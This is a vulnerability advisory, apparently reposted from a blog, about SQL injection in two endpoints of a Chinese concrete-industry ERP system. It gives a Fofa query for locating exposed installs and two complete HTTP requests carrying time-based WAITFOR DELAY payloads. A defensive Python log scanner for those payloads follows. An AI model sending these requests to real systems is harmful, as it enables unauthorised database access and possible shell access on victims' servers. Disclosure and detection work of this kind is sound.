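0x01 Vulnerability description:
商混ERP系统 is a comprehensive enterprise resource planning (ERP) system developed for the concrete industry. It integrates production, sales, procurement, finance and other functions, giving concrete producers a complete and efficient digital management platform. The Operater_Action.aspx and StockreceiveEdit.aspx endpoints are vulnerable to SQL injection; on systems running with a high-privilege role, a shell can be obtained.
0x02 Search query: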
Fofa:app="商混ERP系统"
0x03 Vulnerability reproduction:
SQL injection in Operater_Action.aspx
GET /Dispatch/Operater_Action.aspx?action=TaskComplete&id=1%27WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Note: this endpoint executes the statement twice.
SQL injection in the StockreceiveEdit.aspx endpoint
GET /ERP/StockreceiveEdit.aspx?id=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
0x04 Remediation:
The vendor has released a patch; apply it promptly.
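While the patch is being rolled out, web server logs can be checked for requests shaped like the two reproductions above. The following is an added example, not part of the original post or the vendor's code: it assumes IIS W3C logs with a #Fields header and assumes a legitimate id is a plain integer; the function names scan and id_values and the sample log are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Endpoints named in this write-up; IIS paths are case-insensitive.
WATCHED = {"/dispatch/operater_action.aspx", "/erp/stockreceiveedit.aspx"}
DELAY = re.compile(r"waitfor\s+delay", re.I)   # T-SQL delay used in both requests
META = re.compile(r"--|;|'")                   # comment, statement break, quote

def id_values(query):
    """Yield decoded values of every `id` parameter (split on & only)."""
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if name.lower() == "id":
            yield unquote_plus(raw)            # decodes %27, %20 and +

def scan(lines):
    """Return (client_ip, path, reason, time_taken_ms) for suspicious rows."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names for later rows
            continue
        if line.startswith("#") or not line.strip():
            continue
        row = dict(zip(fields, line.split()))
        path = row.get("cs-uri-stem", "")
        if path.lower() not in WATCHED:
            continue
        for value in id_values(row.get("cs-uri-query", "")):
            if value.isdigit():                # assumed legitimate shape of id
                continue
            reason = ("time-delay" if DELAY.search(value) else
                      "sql-metachar" if META.search(value) else "non-numeric-id")
            hits.append((row.get("c-ip"), path, reason,
                         int(row.get("time-taken", 0))))
    return hits

# Constructed sample log (not real traffic); 203.0.113.7 is a documentation address.
SAMPLE = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status time-taken
2024-09-15 08:00:01 GET /ERP/StockreceiveEdit.aspx id=42 10.0.0.5 200 31
2024-09-15 08:00:07 GET /Dispatch/Operater_Action.aspx action=TaskComplete&id=1%27WAITFOR+DELAY+%270:0:5%27-- 203.0.113.7 200 10042
2024-09-15 08:00:19 GET /ERP/StockreceiveEdit.aspx id=1;WAITFOR%20DELAY%20%270:0:5%27-- 203.0.113.7 200 5019
2024-09-15 08:00:25 GET /ERP/Other.aspx id=1%27 203.0.113.7 200 12
""".splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A hit with reason time-delay together with a time-taken value of several seconds is the strongest signal; non-numeric-id hits are worth reviewing but may be benign if the application accepts other id formats.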
From: https://blog.csdn.net/xc_214/article/details/142284041